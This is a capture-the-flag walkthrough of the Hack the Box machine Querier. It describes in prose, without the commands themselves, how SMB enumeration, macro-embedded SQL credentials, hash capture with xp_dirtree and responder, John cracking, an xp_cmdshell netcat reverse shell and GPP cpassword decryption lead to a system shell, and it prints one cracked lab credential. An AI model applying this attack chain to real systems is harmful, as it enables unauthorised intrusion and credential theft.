Tuesday, July 16, 2019

Querier


QUERIER

- Layout for this exercise:





1 - INTRODUCTION

The goal of this exercise is to develop a hacking process for the vulnerable machine Querier, what is a machine from the Hack the Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

- The IP for Querier is 10.10.10.82:




- Scanning with Nmap:




- Scanning deeper port 1433 we find additional information about the Microsoft SQL server:





- Scanning deeper port 445 we learn that there is a SMB service running there:






3 - EXPLOITATION


3.1 - Exploiting SMB

- Connecting to SMB using a null session with smbclient we find the shared folder Reports:





- Examining content of shared folder Reports there is the Report.xlsm document, where extension .xlsm indicates a macro enabled spreadsheet created by Microsoft Excel:


https://xlsxwriter.readthedocs.io/working_with_macros.html





3.2 - Exploiting the .xlsm document


- Downloading to Kali the .xlsm file:











- Obviously the easiest way of reading this .xlsm document would be to use Microsoft Excel, however in this case let's assume that 
Microsoft Excel is not available.

- Unzipping:




- The file vbaProject.bin inside folder xl contains the functions and/or macros:


https://xlsxwriter.readthedocs.io/working_with_macros.html








- Applying command strings over the file vbaProject.bin we find credentials for the SQL Server:




- Storing the credentials:




3.3 - Exploiting the SQL server


- The Python script mssqlclient.py helps to connect to the SQL Server:






- Connecting with option -windows-auth (default authentication) and using the credentials from previous point 3.2:







- The command enable_xp_cmdshell (allows to run any command line) does not work because the user reporting does not have enough permissions:





- Actually at this moment we don't have sysadmin permissions:







- However we can achieve more information by executing xp_dirtree (which lists all the files in the folder) and enabling responder to catch the leaked NetNTLMv2 hashes.

- responder will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix:

https://gitlab.com/kalilinux/packages/responder





- Running xp_dirtree:





- responder sniffs the NetNTLMv2 hashes.




- Storing the hashes:




3.4 - Cracking the NetNTLMv2 hashes with John The Ripper

- Applying John The Ripper over the hashes we discover credentials mssql-svc:corporate568:





3.5 - Getting a remote shell


- Let's reconnect to the SQL Server with the new credentials mssql-svc:corporate568:





- Now enable_xp_cmdshell is successful (usually it is disabled by default) because user mssql-svc has enough permissions:







- Downloading nc.exe to Kali:




- Transferring nc.exe from Kali to Querier:






- Starting a Netcat listening session on port 5555:




- Launching a Netcat connection from Querier to Kali:




- The connection is successful and we get a remote shell:








4 - CAPTURING THE 1st FLAG

- Reading user.txt:





5 - PRIVILEGE ESCALATION

- Access to Administrator's folder is denied:



- However access to Groups.xml is granted:




- Storing cpassword:




- Decrypting cpassword with the well-known gpp-decrypt:

https://github.com/BustedSec/gpp-decrypt




- So credentials for the Administrator are:




- Psexec.py is able to spawn the System shell:





6 - CAPTURING THE 2nd FLAG

- Reading root.txt: